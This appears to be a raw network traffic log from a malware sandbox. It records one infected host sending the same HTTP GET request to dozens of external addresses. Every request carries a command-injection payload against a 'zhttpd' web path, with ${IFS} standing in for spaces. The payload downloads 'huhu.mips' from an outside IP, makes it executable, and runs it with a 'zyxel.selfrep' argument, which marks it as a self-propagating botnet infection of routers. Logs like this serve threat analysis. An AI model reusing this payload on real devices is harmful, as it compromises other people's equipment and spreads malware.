                                            Feb 2, 2024 06:21:19.764808893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5972192.168.2.154930239.108.108.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764842987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5973192.168.2.1538528125.98.194.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764874935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5974192.168.2.154570667.190.146.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764924049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5975192.168.2.1550270109.88.113.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.764940023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5976192.168.2.155716836.199.194.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765008926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5977192.168.2.155292248.245.130.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765064955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5978192.168.2.155880458.38.4.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765105009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5979192.168.2.1556134212.108.91.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765144110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5980192.168.2.1560930150.59.129.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765182018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5981192.168.2.155739286.39.100.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765202045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5982192.168.2.154267418.149.246.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765259981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5983192.168.2.155212464.237.243.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765285969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5984192.168.2.154226671.27.183.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765312910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5985192.168.2.156056460.192.193.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765350103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5986192.168.2.1541948211.198.1.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765393972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5987192.168.2.1549452187.45.68.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765423059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5988192.168.2.1547762121.4.244.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765477896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5989192.168.2.155814490.91.94.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765532017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5990192.168.2.154197277.25.238.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765574932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5991192.168.2.155676287.81.100.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765608072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5992192.168.2.155253693.213.5.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765640974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5993192.168.2.153514068.51.180.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765693903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5994192.168.2.155804244.159.182.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765738964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5995192.168.2.1557326171.164.41.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765769005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5996192.168.2.1541660111.59.82.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765818119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5997192.168.2.155622845.133.51.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765836000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5998192.168.2.1556844125.208.166.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765897036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5999192.168.2.1551092104.23.252.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765922070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6000192.168.2.155164068.30.68.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.765983105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6001192.168.2.1533496161.246.116.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766011000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6002192.168.2.1542802178.61.82.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766047001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6003192.168.2.1538332116.133.189.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766082048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6004192.168.2.156083042.232.76.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766108036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6005192.168.2.1559390130.174.106.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766165018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6006192.168.2.154522624.120.9.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766217947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6007192.168.2.155665254.169.232.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766243935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6008192.168.2.155868863.131.202.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766289949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6009192.168.2.1553280197.199.101.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766323090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6010192.168.2.154340641.11.246.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766346931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6011192.168.2.154560482.54.109.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766417027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6012192.168.2.1543266180.146.229.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766447067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6013192.168.2.1553112204.221.168.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766505003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6014192.168.2.1549560184.167.135.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766534090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6015192.168.2.1547440212.192.124.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766582966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6016192.168.2.154794882.111.156.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766606092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6017192.168.2.1558242221.242.13.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766654015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6018192.168.2.1541442132.222.210.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766695023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6019192.168.2.1557552186.248.83.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766746044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6020192.168.2.1545830183.24.154.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766793013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6021192.168.2.153931288.126.1.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766838074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6022192.168.2.154378231.202.191.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766881943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6023192.168.2.1534648107.207.122.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766899109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6024192.168.2.153391649.39.102.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766942024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6025192.168.2.1542446171.223.212.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.766989946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6026192.168.2.1536694117.51.170.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767040014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6027192.168.2.154290024.36.52.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767076015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6028192.168.2.1545458119.9.232.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767113924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6029192.168.2.155920060.22.244.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767143011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6030192.168.2.1536086104.249.140.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767177105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6031192.168.2.1557220156.106.207.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767215967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6032192.168.2.1543094165.33.174.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767249107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6033192.168.2.1559640112.185.198.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767281055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6034192.168.2.1554308105.186.199.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.767348051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6035192.168.2.1553454169.104.152.82443
                                            TimestampBytes transferredDirectionData
